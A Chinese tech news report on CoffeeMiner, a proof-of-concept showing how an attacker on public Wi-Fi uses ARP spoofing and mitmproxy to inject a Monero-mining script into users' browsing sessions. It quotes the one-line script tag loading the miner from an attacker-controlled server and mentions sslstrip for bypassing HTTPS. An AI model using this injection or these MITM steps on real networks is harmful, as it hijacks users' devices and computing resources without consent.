新型 CoffeeMiner 攻击:劫持公共 Wi-Fi 用户设备秘密挖掘门罗币

据外媒 1 月 6 日报道,开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目,展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。

加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前,黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本,将其变成了自己的矿机疯狂挖掘门罗币(与比特币类似的一种加密货币)。 Arnau 专家受到了星巴克案件的启发,破解公共 Wi-Fi 网络,将加密挖掘代码注入到连接的浏览会话中,迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。

Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ,这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。

Arnau 专家分享 CoffeeMiner 攻击方式:

通过欺骗局域网上的地址解析协议(ARP)消息拦截网络上其他设备的未加密传输。

使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁,开发人员只注入了一行调用加密货币矿工的代码。

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>

然后,通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时,运行 JavaScript 滥用 CPU 时间,并使用 CoinHive 加密挖掘软件挖掘 Monero 。

一旦编译完成,这些元素就会成为一个单独的脚本,可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由,导致其设备在浏览时挖掘加密货币。

目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS,但是可以通过添加 sslstrip 来绕过限制。

(责任编辑:冬天的宇)

分享到:

更多
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
  • 微笑/wx
  • 撇嘴/pz
  • 抓狂/zk
  • 流汗/lh
  • 大兵/db
  • 奋斗/fd
  • 疑问/yw
  • 晕/y
  • 偷笑/wx
  • 可爱/ka
  • 傲慢/am
  • 惊恐/jk
用户名: 验证码:点击我更换图片
资料下载专区
图文资讯

新型 CoffeeMiner 攻击:劫持公共 Wi-Fi 用

新型 CoffeeMiner 攻击:劫持公共 Wi-Fi 用户设备秘密挖掘门罗币

据外媒 1 月 6 日报道,开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目,展...[详细]

韩国监管再出狠手:数字货币狂泻,瑞波币一

韩国监管再出狠手:数字货币狂泻,瑞波币一度日跌逾 30%

韩国监管进一步加强,数字货币再度大跌。追踪数字货币市值与价格网站 Coinmarketcap ...[详细]

吸取芯片漏洞教训 英特尔将建立新的网络安

吸取芯片漏洞教训 英特尔将建立新的网络安全部门

据路透社北京时间1月9日报道,在芯片漏洞在近期被曝光后,英特尔公司将建立一个新的内...[详细]

韩国监管再出狠手 数字货币狂泻 瑞波币一度

韩国监管再出狠手 数字货币狂泻 瑞波币一度日跌逾30%

追踪数字货币市值与价格网站Coinmarketcap数据显示,截至北京时间8日23点19分,市值排...[详细]

关注:英特尔CPU安全漏洞问题持续发酵

关注:英特尔CPU安全漏洞问题持续发酵

《日本经济新闻》1月7日报道称,英国技术媒体《The Register》近日报道称,英特尔制造...[详细]

返回首页 返回顶部